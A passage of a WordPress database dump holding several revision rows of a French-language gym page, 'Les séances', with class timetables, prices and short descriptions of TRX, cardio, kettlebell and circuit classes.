diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:01:59', '2013-07-03 17:01:59', '', 11, 'http://www.crosstrainingcenter.be/?p=179', 0, 'revision', '', 0),
(180, 1, '2013-07-03 17:02:21', '2013-07-03 17:02:21', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr class=\"tabb\">\r\n<td >LUNDI</td>\r\n<td >MARDI</td>\r\n<td >MERCREDI</td>\r\n<td >JEUDI</td>\r\n<td >VENDREDI</td>\r\n</tr>\r\n<tr class=\"tabb\">\r\n<td >17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:02:21', '2013-07-03 17:02:21', '', 11, 'http://www.crosstrainingcenter.be/?p=180', 0, 'revision', '', 0),
(181, 1, '2013-07-03 17:03:11', '2013-07-03 17:03:11', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr class=\"tabb\">\r\n<td >LUNDI</td>\r\n<td >MARDI</td>\r\n<td >MERCREDI</td>\r\n<td >JEUDI</td>\r\n<td >VENDREDI</td>\r\n</tr>\r\n<tr class=\"tabb\">\r\n<td >17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:03:11', '2013-07-03 17:03:11', '', 11, 'http://www.crosstrainingcenter.be/?p=181', 0, 'revision', '', 0),
(186, 1, '2013-07-03 17:30:27', '2013-07-03 17:30:27', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr >\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\" >MARDI</td>\r\n<td class=\"ttitreh\" >MERCREDI</td>\r\n<td class=\"ttitreh\" >JEUDI</td>\r\n<td  class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr >\r\n<td class=\"ttitre\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 